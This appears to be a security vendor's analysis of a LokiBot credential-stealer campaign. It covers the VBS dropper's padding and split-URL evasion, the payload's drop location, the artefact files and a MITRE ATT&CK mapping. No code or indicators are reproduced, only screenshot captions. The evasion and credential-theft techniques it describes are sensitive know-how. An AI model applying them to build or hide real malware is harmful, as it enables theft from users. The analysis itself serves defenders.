Distribution of LokiBot
This article introduces the latest wave of VBS LokiBot campaign, and it’s subsequent analysis by LMNTRIX. One of the most prevalent malware families that the LMNTRIX CDC has recently seen is called LokiBot. It targets hundreds of computer programs installed on the compromised system, including commonly used web browsers, email clients, and FTP servers, in order to steal sensitive information from the target like usernames, passwords, and cryptocurrency wallets.
Our technical analysis suggests that it was likely produced in one of the former USSR states (Russia, Ukraine, Kazakhstan, Tajikistan, and Belarus). The LokiBot malware’s most recent samples are propagated through malspam campaigns that encourage recipients to download infected file attachments. It is frequently used to spread the infection through a wide range of methods, including sharing Microsoft Office documents or script files that are designed to download and install additional malware payloads, including archive files containing an ISO file or a LokiBot executable.
The initial vectors may vary depending on the individual threat actor and their targets, we all know that the threat actors will perform basic reconnaissance, when he targets a certain geography prior to choosing the infection vector.
Technical Analysis of Lokibot VBS Campaign
VBS (Virtual Basic Script) file is an interpreted scripting language which contains code that can be executed within Windows or Internet Explorer, via the Windows-based script host (Wscript.exe), to perform certain admin and processing functions. Visual Basic for Applications (VBA) code can be included as a part of the file header and footer properties (Left-Header, Center-Header, Right-Header, Left-Footer, Center-Footer, and Right-Footer). This is very helpful for an analyst when analyzing any script file / script based malware.
Snap 1: Header Content
Our sample contains a header content of dotted element. With these tricks, can we analyze the sample adequately?? Probably not. The malware author dupes the target to believe there’s no hidden content inside the file. Let’s examine the footer content of our sample and, then we can start our analysis.
Snap 2: Footer Content
Snapshot shown above was taken from the sample’s footer content. This section also contains the dotted elements (padding). Does it mean it’s a legitimate file??
The embedded content was really deftly placed in the centre of the file by the malware author, the main reason is to facilitate AV evasion, or to avoid being detected by the AV vendors. Just observe the header’s starting line and ending line, almost 2000 lines, the author chooses to pad the centre of the file with dotted lines to hide the malicious content.
Snap 3: Middle content
Snap 4: Embedded Content
From the snapshot seen above, we can observe a function inside the file is obfuscated. Upon additional analysis, we should be able to predict & replace the content exactly.
Snap 5: Embedded Content with URL
With further analysis, LMNTRIX CDC is able to predict the multi-part URL, and it’s declared functions.The URL is split into smaller parts and rejoined to avoid detection, another manoeuvre in every modern malware author’s bag of tricks. Using the destination URL, it will download the payload file and store it in the Windows’ %AppData% folder.
Snap 6: Threat Identifiers
Snap 7: Initial – Indicator of Compromised [IOC]
It’s the common IOC of Loki-Bot, where it’s used for a long period. Using this URL it will connect with the threat actor’s C2 server.
Once the system is infected, Lokibot will perform the following actions:
- Collecting information about the compromised host.
- Password stealing (from browser history and cookies).
- Targeting web banking links (web injects).
- Password brute forcing.
- Registry manipulation (persistence).
- Replicating its copies.
- Process injection to conceal the malicious action.
Appendix A – LokiBot Components
These are possibly the files (file artefacts) hidden within the Windows %APPDATA% directory at any given point in time. LMNTRIX has outlined the functions of the files dropped by Loki Bot campaign,
|File Extension||File Description|
|.exe||An executable copy of the malware that will execute each the user account is logged into|
|.hdb||Database of hashes for data that has already been exfiltrated to threat actor’s C2 server|
|.kdb||Database of keylogging data that has yet to be sent to the C2 server|
|.lck||A lock file created when either decrypting windows credentials, or, keylogging to prevent resource conflicts on Windows|
|.vbs||Staged shellcode or, malicious loader to execute functions of the Lokibot campaign|
Appendix B – Indicators of Compromise for LokiBot
MITRE ATT&CK Mapping for Loki Bot
According to MITRE, the Loki Bot uses the following, tools tactics and procedures,
|Tactics/Techniques (TTP)||Malware Function|
|System Network Configuration Discovery [T1016]||LokiBot has the ability to discover the domain name of the infected host.|
|Obfuscated Files or Information [T1027]||LokiBot has encoded strings with base64 encoding.|
|Obfuscated Files or Information: Software Packing [T1027.002]||LokiBot has used several packing methods for obfuscation.|
|System Owner/User Discovery [T1033]||LokiBot has the ability to discover the system information and username on the infected host.|
|Exfiltration Over C2 Channel [T1041]||LokiBot has the ability to initiate contact with command and control to exfiltrate stolen data.|
|Process Injection: Process Hollowing [T1055.012]||LokiBot has used process hollowing to inject into legitimate Windows process vbc.exe.|
|Input Capture: Keylogging [T1056.001]||LokiBot has the ability to capture input on the compromised host via keylogging.|
|Application Layer Protocol: Web Protocols [T1071.001]||LokiBot has used Hypertext Transfer Protocol for command and control.|
|System Information Discovery [T1082]||LokiBot has the ability to discover the computer name and Windows product name/version.|
|User Execution: Malicious File [T1204.002]||LokiBot has been executed through malicious documents contained in spear phishing email.|
|Credentials from Password Stores [T1555]||LokiBot has stolen credentials from multiple applications and data sources including Windows operating system credentials, email clients, File Transfer Protocol, and Secure File Transfer Protocol clients.|
|Credentials from Password Stores: Credentials from Web Browsers [T1555.003]||LokiBot has demonstrated the ability to steal credentials from multiple applications and data sources including Safari and Chromium and Mozilla Firefox-based web browsers.|
|Hide Artifacts: Hidden Files and Directories [T1564.001]||LokiBot has the ability to copy itself to a hidden file and directory.|